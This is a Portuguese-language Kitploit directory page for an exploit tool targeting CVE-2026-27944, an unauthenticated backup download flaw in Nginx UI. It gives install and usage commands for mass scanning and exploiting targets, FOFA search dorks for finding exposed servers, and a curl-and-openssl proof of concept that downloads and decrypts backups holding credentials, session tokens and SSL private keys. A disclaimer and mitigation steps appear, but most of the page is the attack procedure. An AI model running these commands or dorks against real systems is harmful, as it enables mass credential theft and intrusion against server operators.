Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Cve-2026-27944-Tools-Exploit — Suka suka lah | Kitploit
Ferramentas/GitHubGitHub/bimabalance/cve-2026-27944-tools-exploit
ReconnaissanceEncryption/Decryption ToolsPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationInformation Gathering
GitHubbimabalance/cve-2026-27944-tools-exploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Cve-2026-27944-Tools-Exploit

Suka suka lah

Ver Repositório
1há 1 mêsAinda não revisado

🚀 CVE-2026-27944: Exploração de Backup Não Autenticado do Nginx UI

📌 Descrição

27944.py é uma ferramenta de exploração para CVE-2026-27944 que permite ao atacante baixar e descriptografar backups do Nginx UI sem autenticação.

Esta vulnerabilidade está presente no Nginx UI versão < 2.3.2 e permite acesso a:

  • Credenciais de usuário e tokens de sessão
  • Chaves privadas SSL
  • Configuração do Nginx
  • Arquivos de banco de dados

🔧 Recursos

  • ✅ Varredura em massa a partir de arquivo alvo
  • ✅ Exploração de alvo único
  • ✅ Download automático de backup
  • ✅ Descriptografia automática AES-256-CBC
  • ✅ Extração automática de credenciais do backup

🛠️ Como Instalar

root@kitploit:~
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt

🚀 Como Usar

  1. Varredura em Massa
root@kitploit:~
python 27944.py -f targets.txt -o hasil_scan
  1. Exploração de Alvo Único
root@kitploit:~
python 27944.py -t target.com:9000 --exploit --decrypt
  1. Exploração Completa
root@kitploit:~
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full

📋 Formato dos Alvos

root@kitploit:~
target1.com:9000
192.168.1.1:9000
target2.com:8080

🎯 Dork FOFA

root@kitploit:~
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"

📂 Resultado da Saída

root@kitploit:~
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
    ├── app.ini
    ├── database.db
    ├── nginx.conf
    └── ssl/

⚠️ Aviso Legal

Esta ferramenta foi criada para fins educacionais e de teste de segurança ética. O autor não se responsabiliza pelo uso indevido desta ferramenta. Use apenas em sistemas que você possui ou para os quais tenha autorização por escrito para testar.

📝 Explicação Técnica

CVE-2026-27944 é uma vulnerabilidade crítica no Nginx UI que permite ao atacante acessar o endpoint /api/backup sem autenticação. O backup contém dados sensíveis criptografados com AES-256, porém a chave e o IV são enviados através do cabeçalho X-Backup-Security no formato Base64.

Pontuação CVSS: 9.8 (Crítico)

Versão Afetada: Nginx UI < 2.3.2

Mitigação:

  1. Atualizar para o Nginx UI v2.3.3
  2. Bloquear acesso a /api/backup
  3. Rotacionar todas as credenciais

💀 Prova de Conceito

root@kitploit:~
# Verificar vulnerabilidade
curl -I http://target:9000/api/backup

# Baixar backup
curl -s http://target:9000/api/backup -o backup.bin

# Descriptografar backup (manual)
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip
Baixar ferramenta